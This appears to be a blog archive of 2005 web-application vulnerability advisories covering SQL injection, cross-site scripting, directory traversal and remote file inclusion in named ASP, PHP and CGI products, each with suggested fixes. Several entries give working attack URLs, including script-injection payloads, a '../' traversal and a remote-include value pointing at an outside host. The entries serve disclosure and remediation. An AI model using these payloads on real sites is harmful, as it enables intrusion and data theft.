    A-FAQ SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://www.alanward.net/afaq
    affected version:1.0 and prior

    Product Description:
    A-FAQ is an ASP application used for managing a database of questions and answers. Features include categories, ratings and full administration area.


    Vuln. Description:
    Input passed to the "faqid" parameter in "faqDspItem.asp" and the "catcode" parameter in "faqDsp.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /faqDspItem.asp?faqid=[SQL]
    /faqDsp.asp?catcode=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    IISWorks ASP KnowledgeBase 2.x XSS vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://www.iisworks.com/aspkb/
    affected version:2.x and prior

    Product Description:
    100% ASP based Knowledge base application that uses a simple MS Access or robust MS SQL database to store articles, FAQ's, etc. in an organized way. Features: Powerful search engine, Clean and intuitive interface, Highly configurable display, Web admin to add, edit and archive articles and categories, Add related downloads to articles, Refer to related articles, User poll, Email feedback, and Article hit counter. Language module support, Logging, NT Authentication.

    Vuln. Description:
    ASP KnowledgeBase contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "a" parameter in "kb.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /kb.asp?a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /kb.asp?ID=210&a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    NetAuctionHelp v3.0 XSS Vuln

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://www.netauctionhelp.com/
    affected version:v3.0 and prior

    Product Description:
    NetAuctionHelp provides auction site source code and managed hosting solutions for the Windows platform. Our auction sites are packed with features for the bidder, seller, and administrator. Our solutions include both complete source code for use on a single web site, and managed hosting solutions for those needing hosting.

    Vuln. Description:
    NetAuctionHelp contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "L", "sort", "category" and "categoryname" parameters in "search.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    examples:
    /search.asp?sort=ed&L=[XSS]
    /search.asp?sort=[XSS]
    /search.asp?sort=ed&L=1&category=[XSS]
    /search.asp?sort=ed&L=1&category=65&categoryname=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    XcClassified v3.x XSS vuln

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://www.xcclassified.com/
    affected version: v3.x and prior



    Product Description:
    Get XcClassified, the leading ASP classified ads software! Add the power of internet ad listings to any web site.
    Since XcClassified is highly customizable, you have the power to make changes in both its look and functionality. Its look and feel can be quickly and easily adjusted to seem 100% integrated with the rest of your web site's design. You can even customize the text and currency for any language or locale. A variety of configuration options make it easy to tailor XcClassified to suit your preferences.


    Vuln. Description:
    XcClassified contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters in "CPSearch.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    XcPhotoAlbum v1.x XSS vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://www.xcphotoalbum.com/
    affected version:v1.x and prior

    Product Description:
    XcPhotoAlbum makes it fast and easy to organize many photos on your web site. You can use it for something as simple as a place to post images for friends and family. You can also use it at work, by creating a gallery of images for products. Show your products in their best light by showing how they are used. Or how your customers use them. It can also be a great way to show things like maintenance procedures or assembly techniques. With XcPhotoAlbum, you are only limited by your imagination.

    Vuln. Description:
    XcPhotoAlbum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search parameters in "PASearch.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    rwAuction Pro v4.0 XSS vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:www.rainworx.com/auction_software.asp?ref=hs1
    affected version:rwAuction Pro v4.0 and prior

    Product Description:
    rwAuction Pro is a feature packed Auction, Classified, and Storefront software package! Also: Bulkloader, Fixed Price, BuyItNow, Dutch, and Trade. HTML editor, Skins, Mult Images, Thumb Creation, Web Admin, Billing, Mult Currencies, Email Templates & MORE!

    Vuln. Description:
    rwAuction Pro v4.0 contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "searchtxt" parameter in "search.asp" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    example:
    /search.asp?searchtxt=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Ideal BB.NET 1.3 XSS vuln

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:www.idealscience.com/site/products/idealbb.net.aspx
    affected version: 1.3 and prior

    Product Description:
    It is a powerful bulletin board program designed to run on the Microsoft .NET framework. It uses Windows technologies and Microsoft SQL server to provide the most powerful bulletin board experience. It offers unparalleled customization options and the most scalable features of any Windows based bulletin board system to date.

    Vuln. Description:
    Ideal BB.NET contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "forumID", "boardID", "postID", "catID" and "memberID" parameters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    few examples:

    /topics.aspx?forumID=59%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /categoryindex.aspx?boardID=1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /topics.aspx?date=12/05/2005&boardID=1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /posts.aspx?postID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /forums.aspx?catID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /member.aspx?memberID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    /topics.aspx?forumID=54&topicRepeater1-p=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    LocazoList Classifieds v1.03c Vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://locazo.net:81/applications/
    affected version:v1.03c and prior

    Product Description:
    LocazoList is a free, text based classifieds system that tries to emulate the popular classifieds organization Craigslist. Easy to use and self maintaining, LocazoList is a great application for small sites that need a fast and simple classifieds system. The system was made completely in ASP and Access (right now there is no MySQL support).

    Vuln. Description:
    Input passed to the "q" parameter in "searchdb.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and also it can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    example:
    /searchdb.asp?q=[CODE]&mode=AND&Submit=Search

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Monday, December 05, 2005

    saralblog v1 SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:http://www.saralblog.org/
    affected version:v.1 and prior

    Product Description:
    saralblog is a very simple to use blog, which has some very innovative features. It uses dynamic tags instead of categories which makes posting a lot quicker and easier. It also has RSS, multi-user support and moderation.

    Vuln. Description:
    Input passed to the "id" parameter in "viewprofile.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /viewprofile.php?id=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PluggedOut Nexus SQL&XSS vuln.

    Vuln. discovered by : r0t
    Date: 6 dec. 2005
    vendor:www.pluggedout.com/index.php?pk=dev_nexus
    affected version:0.1

    Product Description:
    Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each others interests, and communicate with one another either through a private messaging system, or via chat requests and forums.

    Vuln. Description:
    Input passed to the "Location", "Last Name" and "First Name" field parameters in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, and it can also be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    PluggedOut Blog SQL vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:www.pluggedout.com/index.php?pk=dev_blog
    affected version:1.9.4 , 1.9.5 and prior

    Product Description:
    Blog is an open source script you can run on your web server to give you an online journal or diary. It can be used equally well for any kind of calendar application. Features - Multi User (with Roles : Admin, Author, Contributor) - Themes and Templates - Wonderful admin/authoring interface - Calendar with highlighted entries - RSS feed support built in - Smiley Faces - Great templating system - Comments on entries - Superb support forum - Built by a professional software developer - Based on PHP, MySQL

    Vuln. Description:
    Input passed to the "categoryid", "entryid", "year", "month" and "day" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:
    /index.php?categoryid=[SQL]
    /index.php?entryid=[SQL]
    /index.php?month=1&year=[SQL]
    /index.php?month=[SQL]
    /index.php?year=2005&month=12&day=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    iWonder Designs

    iwonderdesigns.com/storystream/

    iWonder Designs provides custom application and web development services at affordable prices
    with the highest standards of quality.

    StoryStream:
    -Stories
    ....
    -Reading Room
    ....
    -Creativity Room
    ....
    -Lounge
    ....

    Bug:
    /include/files.inc.php

    The variable $baseDir is used in an insecure manner. If register_globals=On, remote code execution can result.

    example:
    baseDir=pridels.blogspot.com/iwonderdesignsUCKS.php?

    This product is still in Beta according to SourceForge. However, since these developers also do 'contract' coding, I do not doubt this product may appear on final production servers.

    Similar problems may exist in sites coded by them.
    iwonderdesigns.com/contracting/
    Even though they claim:
    "Highest standards of quality", but maybe basic security is not part of their high standards.


    der4444 - pridels.blogspot.com
    How can people make money coding crap like that?
    This document is the intellectual property of me, so leave it as is.
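    The $baseDir bug above is the classic register_globals include pattern. As an added PHP illustration (not iWonder Designs or CF_Nuke code; the directory layout, module names and function names are assumed), here is that shape next to a hardened version, which also covers the "../" include reported for CF_Nuke's "sector" and "page" parameters.

```php
<?php
// Added illustration for the $baseDir report above (and, in spirit, the CF_Nuke
// "sector"/"page" include); not iWonder Designs or CF_Nuke code. The directory
// layout and module names are assumed.

// Vulnerable shape: the include path is built from a variable the script never
// initialises. With register_globals=On, PHP populates $baseDir from a request
// parameter of the same name, so ?baseDir=http://... makes include() fetch and
// run a remote file (allow_url_fopen permitting); with a page parameter and
// "../" the same shape yields a local file include.
function loadModuleVulnerable(string $module): void
{
    global $baseDir;                       // assigned nowhere in the application
    include $baseDir . '/modules/' . $module . '.inc.php';
}

// Hardened, in three layers:
// 1. The base directory is a constant derived from the script's own location;
//    no request variable can supply it (and register_globals stays Off).
define('APP_BASE_DIR', __DIR__);

// 2. The requested module is matched against an allow-list of known names and
//    is never used as raw path text, so "../", URLs and NUL bytes cannot pass.
const ALLOWED_MODULES = ['news', 'links', 'quotes', 'reviews'];

function resolveModulePath(string $module): string
{
    if (!in_array($module, ALLOWED_MODULES, true)) {
        throw new InvalidArgumentException('unknown module');
    }
    // 3. Confirm the resolved file really lives under the modules directory;
    //    this also catches symlinks pointing elsewhere.
    $root = realpath(APP_BASE_DIR . '/modules');
    $real = realpath(APP_BASE_DIR . '/modules/' . $module . '.inc.php');
    if ($root === false || $real === false || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('module file not found under the modules directory');
    }
    return $real;
}

function loadModuleSafe(string $module): void
{
    include resolveModulePath($module);
}

// php.ini settings that limit the blast radius of this bug class (they complement
// the code fix, they do not replace it):
//   register_globals  = Off
//   allow_url_include = Off   (PHP 5.2 and later)
//   allow_url_fopen   = Off   (if the application never needs remote reads)

// Self-check: only an allow-listed name that exists on disk is accepted.
if (PHP_SAPI === 'cli') {
    foreach (['news', '../local-file', 'http://example.invalid/x.php?'] as $candidate) {
        try {
            echo $candidate, ' -> ', resolveModulePath($candidate), "\n";
        } catch (Exception $e) {
            echo $candidate, ' -> rejected (', $e->getMessage(), ")\n";
        }
    }
}
```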

    coWiki 0.3.4 XSS vuln

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.cowiki.org/
    affected version: coWiki 0.3.4 (Boron) and prior

    Product Description:
    coWiki is a sophisticated but easy to use web collaboration tool that helps you and your co-workers to create and organize web documents, weblogs and knowledgebases or any other document structures directly in their HTML browser. You may evolve ideas and gain a concomitant XML documentation of your brainstorming without having to concentrate on complicated structural syntaxes.
    In many senses, it is very like a wiki but additionally provides an easy way to secure and discuss its documents.

    Vuln. Description:
    Input passed to the "q" parameter isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    example:
    /26.html?cmd=srchdoc&q=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&x=7&y=14

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Blog System v1.2 SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.netartmedia.net/blogsystem/
    affected version:v1.2 and prior

    Product Description:
    Blog System allows you to launch and run powerful blog portals and your own weblog hosting service or simply integrate blog functionality to your existing website. The system offers rich functionality for the blog users to update their blogs (add notes, comments, upload pictures and create photo albums, upload audio and video files and many others) and for the administrators to monitor and control the whole system (monitor the users, the space occupied and the bandwidth of the blogs, manage the website structure and content with a powerful CMS and many others). Blog System is a reliable blog software product which comes with an easy customizable template based front site and blog administration space. In order to run a blog portal with it, you don't need your own server or virtual server but just an ordinary hosting package supporting PHP and MySQL. We offer flexible payment schemes and free customization of the blog portal front site in order that it matches the best your needs.

    Vuln. Description:
    Input passed to the "cat" parameter in "index.php" and "note" parameter in "blog.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /blog.php?user=r0t&note=[SQL]
    /index.php?mode=home&cat=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Cars Portal v1.x SQL injection.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://software.getcar.biz/
    affected version:v1.1 and prior

    Product Description:
    Cars Portal is a software solution for running auto classifieds portals. It provides functionality for the private sellers to signup, list their car for sale and make changes in their ads online using the private sellers administration space. The product provides special functionalities for the dealers to work and manage multiple ads. An affiliate functionality is also included, affiliate partners may signup and earn commissions on all the sales done through their links. The product comes with a very powerful back office application for the administrators, allowing them not only to manage the cars portal settings, the dealers, affiliates etc. but also providing them full control over the website, its structure and content, statistics, search engines functionality and many others.

    Vuln. Description:
    Input passed to the "page" and "car" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /index.php?page=[SQL]
    /index.php?page=en_Home&car=[SQL]


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    HobSR SQL inj. vuln

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:www.hobosworld.com/scripts.php?id=5
    affected version:1.0 and prior

    Product Description:
    HobSR is a top sites script where users sign up to have their website on a list of websites, and each click in/out is counted for them. This script has the ability to have unlimited admins and websites. This script also features a verify program where all websites who sign up must be verified by the admin to be put on the list. You NEED MYSQL to run this script.

    Vuln. Description:
    Input passed to the "arrange" and "p" parameter in "view.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /view.php?arrange=[SQL]
    /view.php?p=[SQL]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    KeyWord Frequency Counter v1.0 XSS vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.web4future.com/free/wordcount.htm
    affected version:1.0 and prior


    Product Description:

    A free script that analyzes the word structure of any page on your website and lets you compare it with your competitors'.
    Written in: Perl for Unix

    Vuln. Description:

    KeyWord Frequency Counter contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the remote URL submitted to the index.cgi script before returning it to the user. This could allow a user to create a specially crafted URL that would execute arbitrary script in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:

    Edit the source code so that the submitted URL is HTML-encoded (e.g. with HTML::Entities::encode_entities) before being echoed into the page.

    Web4Future eDating Professional v5 sql vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.web4future.com/products.php?p=edating
    affected version: v5 and prior

    Product Description:
    eDating Professional is an online dating software that allows you to start your own dating website.

    Vuln. Description:
    Input passed to the "s", "pg" and "sortb" parameters in "index.php", the "cid" parameter in "gift.php" and "fq.php", and the "cat" parameter in "articles.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    examples:
    /index.php?afis=browse&s=[SQL]
    /index.php?afis=profil&pg=[SQL]
    /index.php?afis=SelCupidonNoLog&sortb=[SQL]
    /gift.php?A=ViewGifts&cid=[SQL]
    /articles.php?cat=1[SQL]
    /articles.php?A=ViewArticles&cat=1[SQL]
    /fq.php?A=ViewFQ&cid=1[SQL]

    Solution:
    Edit the source code so that request parameters are never concatenated into SQL: bind "s", "cid" and "cat" as query parameters (or cast the numeric ones to integers), cast "pg" to an integer, and check "sortb" against a fixed list of column names.

    Web4Future Portal Solutions - News Portal vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.web4future.com/products.php?p=nportal
    affected version: latest

    Product Description:
    It's a professional solution dedicated for Newspapers and publications that want to easily present their paper on the Internet. It comes with an easy to use web site manager, automated newsletter creation utility, automated weather forecast system and currency converter. It creates everything automated: front page, newsletter, archive.

    Vuln. Description:

    1. SQL injection vuln.
    Input passed to the "idp" parameter in "comentarii.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    example:
    /comentarii.php?idp=[SQL]

    2.Directory Traversal vuln.

    Input passed to the "dir" parameter in "arhiva.php" isn't properly sanitised before being used to build a filesystem path. This can be exploited to view the contents of arbitrary files on the system via directory traversal attacks.

    example:
    /arhiva.php?dir=../

    Solution:
    Edit the source code so that "idp" is bound as a query parameter or cast to an integer instead of being concatenated into SQL, and so that the "dir" value is resolved against the archive directory and rejected when the result lies outside it.

    Web4Future eCommerce Enterprise Edition v2.1 SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.web4future.com/products.php?p=ecomm
    affected version: v2.1 and prior; the eCommerce HOME edition has the same vuln.

    Product Description:
    A fully template-driven system which you can use to sell any kind of product, from computers, household items, downloadable goods, services and groceries to cars or real estate.


    Vuln. Description:

    Input passed to the "prod" and "brid" parameters in "view.php", the "bid" parameter in "viewbrands.php" and the "grp" and "cat" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    examples:
    /view.php?prod=[SQL]
    /viewbrands.php?bid=[SQL]
    /view.php?prod=1010001&brid=[SQL]
    /index.php?action=ViewGroups&grp=[SQL]
    /index.php?action=ViewCategories&cat=[SQL]

    Solution:
    Edit the source code so that these id parameters are cast to integers or bound as query parameters instead of being concatenated into SQL.

    Web4Future Affiliate Manager PRO SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.web4future.com/products.php?p=aff
    affected version:4.1 and prior

    Product Description:
    Affiliate Manager Professional is an affiliate script that was created to ease your work. It keeps track of new affiliates and lets you approve them with a single click, keeps track of every purchase generated by a referral, has a fraud detection system that e-mails you when there are problems, displays graphical stats in multiple forms, has a clear and easy to use interface, etc. It can be used to track recurring commissions and now allows MLM affiliate programs.

    Vuln. Description:

    Input passed to the "pid" parameter in "functions.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    example:
    /functions.php?action=ViewPaymentLog&pid=[SQL]

    Solution:
    Edit the source code so that "pid" is cast to an integer or bound as a query parameter instead of being concatenated into SQL.

    Easy Search System v1.1 XSS vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.hotcgiscripts.net/?c=e-search
    affected version:v1.1 and prior


    Product Description:
    Easy Search System is a powerful, customizable and effective site indexing/searching script. Index your website over cgi, php, asp and any web pages. It collects meta description, meta keywords, titles, page content and link texts from all pages on your site. You can define the weight of each of these page parts to make the search as powerful as possible. Customize search results and "Not found" pages. Edit stop words. Search within parts of the site. Show in statistics the most searched keywords and the not-found keywords. You can create page groups. Index groups of your site every day, week or month automatically. Define rules to automatically add pages to groups or to ignore files and directories. It shows dead links on your site and links to dead sites. You can see internal and EXTERNAL outgoing and incoming links for every indexed page with the Easy Search System script. It can index several sites into one database so that your users can search all your sites from one form, or only parts of your site. You can create several search forms to search any of your site's parts. You can search for one or more terms at the same time, and may input single words and phrases as search terms together. Phrases are enclosed in quotes, as in world wide search engines like Google. Terms can be combined by logical operators: the sign "+" marks a term as forced (it must be present); the sign "-" marks a term as forbidden (it must not be present). All unsigned terms can automatically be marked as forced (by activating the checkbox "+" near the input field).
    The Easy Search System provides a solution with far more flexibility and power than any other at a price you can afford.



    Vuln. description:
    Input passed to the "q" parameter in "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    example:
    /search.cgi?q=[XSS]


    Solution:
    Edit the source code so that the "q" value is HTML-encoded (e.g. with HTML::Entities::encode_entities) before being echoed into the results page.

    1- Search XSS vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.1-script.com/1_search/
    affected version:1.80 and prior


    Product Description:
    An advanced site search script written with search engines positioning in mind - result pages contain all proper tags to be submitted to search engines as doorway pages. The script logs all the searches, found and not found, inserts affiliate codes so that you never miss commission. Comes with advanced administration utility for setup, viewing statistics, changing appearance and much more. New version includes an optimized search algorithm for faster searches.

    Vuln. description:
    Input passed to the parameter "q" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


    example:
    /1search.cgi?q=[XSS]&boolean=ALL&case=Insensitive

    Solution:
    Edit the source code so that the "q" value is HTML-encoded (e.g. with HTML::Entities::encode_entities) before being echoed into the results page.

    Amazon Search Directory XSS vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.mrcgiguy.com/amazondetails.shtml
    affected version:v.1.0.0 and prior


    Product Description:

    * Very easy to set up and use
    * Customizable Header/Footer Templates
    * Automatic insertion of Amazon QuickPay links with your affiliate code.
    * Easy to navigate and search.
    * Ready to use 'out of the box'. The script comes with the categories already created as seen in the demo. Use them if you'd like, or start from scratch.
    * Capable of searching any product type in Amazon's catalog.


    Vuln. description:

    Input passed to the search parameter of "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Solution:
    Edit the source code so that the search term is HTML-encoded (e.g. with HTML::Entities::encode_entities) before being echoed into the results page.

    Hot Links Pro 3.x XSS vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.mrcgiguy.com/hl3details.shtml
    affected version:3.x and prior

    Product Description:
    * Directory style index allows for easy navigation
    * Does not require MySQL, MS Access, or any other database software. Hot Links Pro uses its own integrated flat-file database system.
    * Out going hits are recorded creating a popular links list and displaying a cumulative hit count which is also used to build a Hot Links Page.
    * You control how many links to display on the popular links list
    * You control how many hits a site must have before being listed on the Hot Links Page
    * Cheat protection using IP address for outgoing hits (1 hit per IP per day)
    * Duplicate link verification (Now has option to disable, or to loosen the restrictions to allow duplicates as long as they're in separate categories).
    * Easily edit the look of your directory without having to pick through any of the PERL code. Header and footer HTML is kept in separate text files.
    * Will run on most servers with Perl 5.x and SendMail installed. Recommended for Unix/Linux or WinNT.
    * Features an easy to edit language file that makes translating the script into other languages painless.
    * New split page listings, break up longer category listings for easier navigation.
    * Create infinite subcategory levels.
    * Most recent listings display right on the index page. You control how many to show.
    * Searchfeed.com Results Integration. Share revenue from this PPC giant by incorporating their feed into your directory



    Vuln. description:

    Input passed to the search parameter of "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Solution:
    Edit the source code so that the search term is HTML-encoded (e.g. with HTML::Entities::encode_entities) before being echoed into the results page.

    Hot Links SQL 3.x XSS vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.mrcgiguy.com/hlsqldetails.shtml
    affected version:3.1.x and prior

    Product Description:
    # Directory style index allows for easy navigation
    # Utilizes the power of MySQL to deliver blazing fast content regardless of the amount of data.
    # Out going and incoming hits are recorded creating a popular links list and displaying a cumulative hit count which is also used to build a Hot Links Page.
    # Control how many links to display on the popular links list.
    # Control the amount of top search terms to display on the index.
    # Control how many hits a site must have before being listed on the Hot Links Page.
    # Cheat protection using IP address for outgoing & incoming hits (1 hit per IP per day).
    # Duplicate link verification (Now has option to disable, or to loosen the restrictions to allow duplicates as long as they're in separate categories).
    # Easily edit the look of your directory without having to pick through any of the PERL code. Almost 100% template based.
    # Will run on most servers with Perl 5.x, MySQL and SendMail installed. Recommended for Unix/Linux.
    # Split page listings, break up longer category & search result listings for easier navigation.
    # Create infinite subcategory levels.
    # Most recent listings display right on the index page. You control how many to show.
    # Features static HTML or Dynamic mode. HTML mode is highly beneficial for search engine rankings and Google PageRank.
    # Integrated reviews and ratings system.
    # Integrated Searchfeed.com results search feed.
    # No longer requires SSI.
    # Static or Dynamic outgoing urls. Now more search engine friendly than ever. Don't want to use redirects, just turn the static url option on.
    # Separate template for sponsor links, make them really stand out and encourage link owners to pay for the upgrade.
    # Algorithm sorting on categories and search results pages.




    Vuln. description:

    Input passed to the search parameter of "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Solution:
    Edit the source code so that the search term is HTML-encoded (e.g. with HTML::Entities::encode_entities) before being echoed into the results page.

    Warm Links XSS vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.mrcgiguy.com/wldetails.shtml
    affected version:v.1.0.0 and prior

    Product Description:
    * Directory style index allows for easy navigation
    * Does not require MySQL, MS Access, or any other database software. Warm Links uses its own integrated flat-file database system.
    * Customizable Color Scheme
    * Duplicate link verification
    * Easily edit the look of your directory without having to pick through any of the PERL code. Header and footer HTML is kept in separate text files.
    * Will run on any server with Perl 5.x and SendMail installed.


    Vuln. description:

    Input passed to the search parameter of "search.cgi" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

    Solution:
    Edit the source code so that the search term is HTML-encoded (e.g. with HTML::Entities::encode_entities) before being echoed into the results page.

    FileLister SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.alltimeflashdreamer.org/filelister/doc/
    affected version:0.51 and prior

    Product Description:
    FileLister is a filesystem indexing tool with a web based frontend. Running platform-independently in a web environment, its goal is to easily find files in large archives, using a rich set of search configuration options. Additionally, you may download single files or even create and download zip files on the fly from the results of your search.


    Vuln. description:
    Input passed to the search parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


    Solution:
    Edit the source code so that the search values are bound as query parameters instead of being concatenated into SQL.

    Widget Property Vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    vendor:http://www.widgetpress.com/products?product=wp
    affected version:1.1.19 and Easy,CSV,Lite versions.


    Product Description:
    Easily manage all your listings in a turnkey database driven web application. Powerful server software with multi-user support, Upload multiple media files. Auto generation of PDF flyers with listing photos, Add featured properties, resume profiles, articles, Generate neighborhood profiles, area profiles, city profiles, area appreciation, utilities, schools, custom generated home page with photos, admin the entire site from anywhere in the world, and dynamic multi-language support. Agent dynamic Vcards. Publish property listings and articles in RSS real estate feeds. Auto syndicates real estate feeds with www.propertyrss.com. Comes with 1 year of Paid Subscriber API's to www.propertyrss.com. Publishes your properties to www.propertywalkthru.com, a free classified real estate site. Supports template interface with XHTML and CSS in a tableless environment.

    Vuln. description:
    Input passed to the "property_id", "zip_code", "property_type_id", "price" and "city_id" parameters in "property.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

    Also, input passed to the "lang" parameter in "property.php" isn't validated before being used to select a language file; requesting a language that does not exist (last example below) makes the script reveal its full installation path (full path disclosure).

    examples:
    /property.php?action=property&property_id=[SQL]

    /property.php?action=search&city_id=&zip_code=[SQL]&price=&property_type_id=1&submit=submit

    /property.php?action=search&city_id=&zip_code=&price=75000&property_type_id=[SQL]&submit=submit

    /property.php?action=search&city_id=&zip_code=&price=[SQL]&property_type_id=&submit=submit

    /property.php?action=search&city_id=[SQL]&zip_code=&price=&property_type_id=&submit=submit


    /property.php?lang=r0t

    Solution:
    Edit the source code so that request parameters are never concatenated into SQL (bind them as query parameters, or cast numeric ids and prices to integers), and so that the "lang" value is accepted only if it names one of the installed language files.

    Widget Imprint SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 5 dec. 2005
    Vendor:http://www.widgetpress.com/products?product=wimprint
    affected version: 1.0.26 and prior

    Product Description:
